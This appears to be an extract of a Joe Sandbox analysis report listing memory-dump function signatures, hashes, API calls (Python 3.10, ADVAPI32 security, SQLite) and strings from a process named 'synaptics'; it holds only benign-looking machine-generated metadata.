                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TimeU_object@@$BuildDecodeE@@@ErrorError@@FileFormatFromLastMessageObject_SizeSystemUnicode_Value_Win_
                                                                                                                                                                                                              • String ID: FileTimeToSystemTime
                                                                                                                                                                                                              • API String ID: 86655538-1754531670
                                                                                                                                                                                                              • Opcode ID: 53d0ff39440556bdda3020f84f911bf8622d573fa6996d03cc76226159d5c244
                                                                                                                                                                                                              • Instruction ID: 89a490b79e05e9cb400168a3b9db8f17ef6892a4bb06990d7f82965cce1d057e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53d0ff39440556bdda3020f84f911bf8622d573fa6996d03cc76226159d5c244
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73F0A7B7A142025F9644FF38CD0391F3BE8AFA4208FC0085CE44583223FA28E51887E3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:Initialize), ref: 6BF41971
                                                                                                                                                                                                              • InitializeAcl.ADVAPI32(?,?,00000000), ref: 6BF4198A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_InitializeParseTuple
                                                                                                                                                                                                              • String ID: :Initialize$InitializeAcl
                                                                                                                                                                                                              • API String ID: 1991639834-2627007299
                                                                                                                                                                                                              • Opcode ID: 45fd13a46f6da08df8a9f398116469b5cbac31a1d2166ad8a56f01edd5a5b146
                                                                                                                                                                                                              • Instruction ID: 94d7129a1f16930523b1f64dd85672a66ed0745f6274116eac4516443cebe562
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45fd13a46f6da08df8a9f398116469b5cbac31a1d2166ad8a56f01edd5a5b146
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6F03776528211AFCB04DF19D904B677FF4EF4A3517044499F848C2636D334D954DB72
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,s#i,?,?), ref: 6BF4A5EA
                                                                                                                                                                                                              • IsTextUnicode.ADVAPI32(?,?,00000000), ref: 6BF4A607
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310(6BF51B1C,00000000), ref: 6BF4A616
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Size$Arg_BuildParseTextTuple_UnicodeValue_
                                                                                                                                                                                                              • String ID: s#i
                                                                                                                                                                                                              • API String ID: 960402000-590455174
                                                                                                                                                                                                              • Opcode ID: fed40e38b8e661fab5ec22c0682973b5fbe84ecda2bd122d4898042645ae2fb8
                                                                                                                                                                                                              • Instruction ID: 1dde465685cd7005517f6e78cf2e0e9a9c5a62caeceff75d4b2d5c3c88f496b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed40e38b8e661fab5ec22c0682973b5fbe84ecda2bd122d4898042645ae2fb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0E0ACB6414101ABDB02EB54DC45DAA7BE8BB54644F440869F995C1025E726962C8AA3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,RECT must be a tuple of 4 ints (left, top, right, bottom)), ref: 6BF4AE4C
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,llll;RECT must be a tuple of 4 ints (left, top, right, bottom),?,?,?,?), ref: 6BF4AE6F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 6BF4AE45
                                                                                                                                                                                                              • llll;RECT must be a tuple of 4 ints (left, top, right, bottom), xrefs: 6BF4AE69
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Err_ParseSizeStringTuple_
                                                                                                                                                                                                              • String ID: RECT must be a tuple of 4 ints (left, top, right, bottom)$llll;RECT must be a tuple of 4 ints (left, top, right, bottom)
                                                                                                                                                                                                              • API String ID: 4247878537-1420951713
                                                                                                                                                                                                              • Opcode ID: 8e00bf6f9a2da30ce237c3389a1c512514312f7f8c7e9ecf34a6345a542139cd
                                                                                                                                                                                                              • Instruction ID: fb396d4b36ce42eb5c6d42ded6c06ffb77d51ee27a8f91727862463c35f74a96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e00bf6f9a2da30ce237c3389a1c512514312f7f8c7e9ecf34a6345a542139cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8E06DB6120104AFD705EF10C844E5BBBF8FB45608F44C598F50986127D636EA6ADB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<COM method offset %d: %s at %p>,?,?,?), ref: 6C0A5FB0
                                                                                                                                                                                                              • PyUnicode_FromFormat.PYTHON310(<%s object at %p>,?,?), ref: 6C0A5FC0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • <COM method offset %d: %s at %p>, xrefs: 6C0A5FAB
                                                                                                                                                                                                              • <%s object at %p>, xrefs: 6C0A5FBB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FormatFromUnicode_
                                                                                                                                                                                                              • String ID: <%s object at %p>$<COM method offset %d: %s at %p>
                                                                                                                                                                                                              • API String ID: 3889672380-1936435395
                                                                                                                                                                                                              • Opcode ID: 1509c17bacbac87754cf33c5ff9280e9db012e8f7d37c929e91e0dbc63288091
                                                                                                                                                                                                              • Instruction ID: 44b1290c55babd10ed1be3aa28d96bc5db2e903a44daa20cb324db79eb48df55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1509c17bacbac87754cf33c5ff9280e9db012e8f7d37c929e91e0dbc63288091
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83E086751041049FDB08CBC9D804EA5B7ECBF48609B044494F40D8BA12D633D4608B55
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __current_exception.VCRUNTIME140 ref: 6BF4BF53
                                                                                                                                                                                                              • __current_exception_context.VCRUNTIME140 ref: 6BF4BF63
                                                                                                                                                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF4BF6A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2542180945-1018135373
                                                                                                                                                                                                              • Opcode ID: dcde137fffab3047d3b5c1b60f095ba811ea36b3338086e78049cb3a6a43b8db
                                                                                                                                                                                                              • Instruction ID: 8ae4db7f10d75356e026a7040d11b7647fa6d5ab306faf133ebcfcb3f7c325b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcde137fffab3047d3b5c1b60f095ba811ea36b3338086e78049cb3a6a43b8db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3F019B990021A8FCB05DFA8C485AADBBF0BB09314F154494E814BB362D738AD01CF65
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __current_exception.VCRUNTIME140 ref: 6BF4BEC9
                                                                                                                                                                                                              • __current_exception_context.VCRUNTIME140 ref: 6BF4BED3
                                                                                                                                                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BF4BEDA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __current_exception__current_exception_contextterminate
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2542180945-1018135373
                                                                                                                                                                                                              • Opcode ID: 70e85b7832b0dbea5139dbf31a995ea7a5c8c02319f5e442f30490b72d62056f
                                                                                                                                                                                                              • Instruction ID: e7b4eff65b5b231fdd2e598174f2b29fb8b0d2fbb254c2b261537f275f5fcc86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70e85b7832b0dbea5139dbf31a995ea7a5c8c02319f5e442f30490b72d62056f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD05B7B0401159F87015F65D40145EFFFCFE4166831508D5DA449B632D778BC1087D1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,POINT must be a tuple of 2 ints (x,y)), ref: 6BF4A89C
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,ll;POINT must be a tuple of 2 ints (x,y),?,?), ref: 6BF4A8B7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ll;POINT must be a tuple of 2 ints (x,y), xrefs: 6BF4A8B1
                                                                                                                                                                                                              • POINT must be a tuple of 2 ints (x,y), xrefs: 6BF4A895
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Err_ParseSizeStringTuple_
                                                                                                                                                                                                              • String ID: POINT must be a tuple of 2 ints (x,y)$ll;POINT must be a tuple of 2 ints (x,y)
                                                                                                                                                                                                              • API String ID: 4247878537-334919720
                                                                                                                                                                                                              • Opcode ID: 13d7be35d8b061d4acba309d42e141f4a2b6b8f2953cfc94cb81a1f1f49f3d94
                                                                                                                                                                                                              • Instruction ID: ae45ff7b9f3bac425cea8de8784151d09ba1c2727be2a2721602cac4fc312bc5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13d7be35d8b061d4acba309d42e141f4a2b6b8f2953cfc94cb81a1f1f49f3d94
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAE04F75521101AFD704EF14C849E2A7BE4FB95608F44C498F50887137E636E96DDB61
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,:GetSubAuthorityCount), ref: 6BF47A59
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(?), ref: 6BF47A6E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(?), ref: 6BF47A78
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_AuthorityCountFromLongLong_ParseSizeTuple_
                                                                                                                                                                                                              • String ID: :GetSubAuthorityCount
                                                                                                                                                                                                              • API String ID: 2015275027-2020981275
                                                                                                                                                                                                              • Opcode ID: 5f669b43d54ae689b81454a8c89b636b09330d26b4f1283c0252980c92f4d606
                                                                                                                                                                                                              • Instruction ID: d0b96ac57c38a013f58bf2f5a6c1b118da58025e186edaa8d9b936c378050755
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f669b43d54ae689b81454a8c89b636b09330d26b4f1283c0252980c92f4d606
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BED05E714241009FCF05AB24DC08A1A7FE4BF51606B8444A0F899C1132D73ADA38DB16
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:GetLength), ref: 6BF47369
                                                                                                                                                                                                              • GetSecurityDescriptorLength.ADVAPI32(?), ref: 6BF4737E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6BF47385
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorFromLengthLongLong_ParseSecurityTuple
                                                                                                                                                                                                              • String ID: :GetLength
                                                                                                                                                                                                              • API String ID: 4021226667-295138441
                                                                                                                                                                                                              • Opcode ID: 2823a165d0bb67cc331ddafea17e895ad4a46bf3e3a2c837524dc09f9b3a2e2f
                                                                                                                                                                                                              • Instruction ID: 08237c2729ff98a2bba43f19234903be1b58c43e49477aaf56a80b68f1583c15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2823a165d0bb67cc331ddafea17e895ad4a46bf3e3a2c837524dc09f9b3a2e2f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD09E755242009BCF05AB68DD0990A7FA4BF65206B8484A4F84981136D739D538DB66
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:IsValid), ref: 6BF47339
                                                                                                                                                                                                              • IsValidSecurityDescriptor.ADVAPI32(?), ref: 6BF4734E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6BF47355
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_DescriptorFromLongLong_ParseSecurityTupleValid
                                                                                                                                                                                                              • String ID: :IsValid
                                                                                                                                                                                                              • API String ID: 3346600250-2800628479
                                                                                                                                                                                                              • Opcode ID: 94af3712c7f107a8490f8928a76ff72b9641a2a3fd25fabf5188bd4cf0150365
                                                                                                                                                                                                              • Instruction ID: e6444a22fa14d316e73d1d3e165f2672dd4eac3dc5cef574107a49ccc0166591
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94af3712c7f107a8490f8928a76ff72b9641a2a3fd25fabf5188bd4cf0150365
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2D05231820100AFCF08AB68DE08A0A3FA4FF44206B8844A0F809C103BD33AD938DB02
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,:GetLength), ref: 6BF47A29
                                                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 6BF47A3E
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6BF47A45
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_FromLengthLongLong_ParseSizeTuple_
                                                                                                                                                                                                              • String ID: :GetLength
                                                                                                                                                                                                              • API String ID: 3909280572-295138441
                                                                                                                                                                                                              • Opcode ID: 7c78025a117884f765693a080dd2666cc6b8ea7547dd006d99b8f47f1410a27e
                                                                                                                                                                                                              • Instruction ID: 9ad997f08b4a649cf32544e4a22da7418258dfe44bad481e50b39c6541a255b7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78025a117884f765693a080dd2666cc6b8ea7547dd006d99b8f47f1410a27e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25D05E354202009BDF05AB28DC0C9097FA4BF50206B844460F50981036D33AD53CDB15
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyArg_ParseTuple.PYTHON310(?,:IsValid), ref: 6BF419C9
                                                                                                                                                                                                              • IsValidAcl.ADVAPI32(?), ref: 6BF419DE
                                                                                                                                                                                                              • PyLong_FromLong.PYTHON310(00000000), ref: 6BF419E5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_FromLongLong_ParseTupleValid
                                                                                                                                                                                                              • String ID: :IsValid
                                                                                                                                                                                                              • API String ID: 2283326261-2800628479
                                                                                                                                                                                                              • Opcode ID: 53528b54c31c0e380da3af1cc80976ac4f56a14702ab2cd618d74a0ca5436a78
                                                                                                                                                                                                              • Instruction ID: 41bd76b4eea25c9289790fb512bd6d93f2982eb1db728a2df471ae6e81df0271
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53528b54c31c0e380da3af1cc80976ac4f56a14702ab2cd618d74a0ca5436a78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAD09E759241009FCF05AB64DD0CA1A7FA4BF55705B844864F9498113BD739D538DA16
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,:IsValid), ref: 6BF47989
                                                                                                                                                                                                              • IsValidSid.ADVAPI32(?), ref: 6BF4799E
                                                                                                                                                                                                              • PyBool_FromLong.PYTHON310(00000000), ref: 6BF479A5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arg_Bool_FromLongParseSizeTuple_Valid
                                                                                                                                                                                                              • String ID: :IsValid
                                                                                                                                                                                                              • API String ID: 475737215-2800628479
                                                                                                                                                                                                              • Opcode ID: 1330ed5cb9501f01506cb9f9735cc6910dc72dc2f14bec923726e4e19845ab55
                                                                                                                                                                                                              • Instruction ID: 9471c3f53d5af90c8a5bc13328c8afb21aba7e5822a962fe1bada38ebc6e9855
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1330ed5cb9501f01506cb9f9735cc6910dc72dc2f14bec923726e4e19845ab55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5ED05235820200AFEF05AB28DE08A0A3FA4BF40606B884464F80D81137D73AC878DB12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_reset.SQLITE3(?), ref: 6C170C60
                                                                                                                                                                                                              • sqlite3_step.SQLITE3(?), ref: 6C170CEF
                                                                                                                                                                                                              • sqlite3_reset.SQLITE3(?), ref: 6C170D04
                                                                                                                                                                                                              • sqlite3_column_int64.SQLITE3(?,00000000), ref: 6C170D19
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3097566579.000000006C0C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 6C0C0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097364508.000000006C0C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097763089.000000006C1C1000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097877844.000000006C1D7000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097988021.000000006C1DA000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
